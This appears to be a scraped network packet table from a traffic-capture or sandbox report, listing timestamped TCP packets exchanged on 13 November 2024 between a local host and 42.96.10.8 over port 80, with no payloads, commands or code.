                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451538086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451550007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451572895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451607943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451618910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451663017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451704025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451709986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451756001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451797962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451812029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451864004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451898098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451900959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451932907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451967001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451980114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452002048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452038050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452049017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452075005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452124119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452650070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452706099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452740908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452754974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452781916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.452825069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547602892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547671080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547707081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547717094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547740936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547775984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547781944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547828913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547863960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547877073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547898054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547934055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.547944069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.548073053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.548106909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.548126936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.548141003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.548186064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565289974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565325975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565359116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565368891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565763950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565808058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565881968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565912962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565947056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565953970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.565983057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566016912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566028118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566335917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566390991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566390991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566426039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566458941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566471100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566529036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566565990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566582918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566618919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566662073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566672087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566705942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.566751957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567040920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567091942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567137957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567188025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567240000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567276001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567284107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567378998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567413092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567425013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567449093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567502975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567795992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567827940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.567872047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663501024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663575888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663614988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663625002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663650990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663686991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663698912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663724899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663760900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663764954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663817883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663853884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663861990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663888931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663925886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.663932085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.681344986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.681395054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.681401014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.681435108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.681478977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682065010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682188034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682231903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682245970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682301998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682337999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682343006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682390928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682426929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682430983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682462931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682502985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682518959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682553053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682595015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682605982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682662010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682696104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682701111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682732105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682766914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682771921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682801962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682837963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682842016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682873964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682909966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.682913065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.683370113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.683403969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.683413982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.683440924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.683485985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.683518887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.683574915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.683608055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.683618069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.727446079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.778873920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.778947115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.778984070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.778996944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779020071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779067993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779076099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779112101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779145956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779164076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779181004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779217005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779226065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779253960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.779298067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797291994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797342062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797382116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797385931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797777891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797815084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797830105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797874928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797909975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797920942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797945976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797980070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.797990084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798017025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798047066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798057079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798086882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798120975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798125982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798156977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798197985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798213005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798247099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798285007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798300982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798336029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798369884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798378944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798408031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798443079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.798453093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799001932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799038887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799051046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799181938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799216032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799227953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799249887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799299955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799365997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799403906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799438000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799451113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799475908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799511909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.799525023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.852436066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894260883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894309044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894366026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894367933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894402981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894439936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894475937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894498110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894514084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894551992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894558907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894587994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894620895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894644022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.894706964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.912584066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.912636042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.912677050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.912684917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913249016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913280964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913336039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913363934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913367033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913387060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913404942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913459063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913466930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913496017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913547039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913674116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913763046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913796902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913809061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913832903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913933039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.913969994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914005041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914038897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914175987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914216995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914264917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914271116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914309978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914343119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914362907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914380074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914635897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914670944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914705992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914721012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914721012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914761066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914794922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914808989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914853096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914887905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914923906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914952040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.914961100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.915209055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.915400982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.915436983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.915455103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.915472031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.917462111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.957859993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.957906961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.957943916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.957958937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.957979918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.958092928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010181904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010225058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010279894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010315895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010344982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010358095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.010358095 CET4973380192.168.2.442.96.10.8
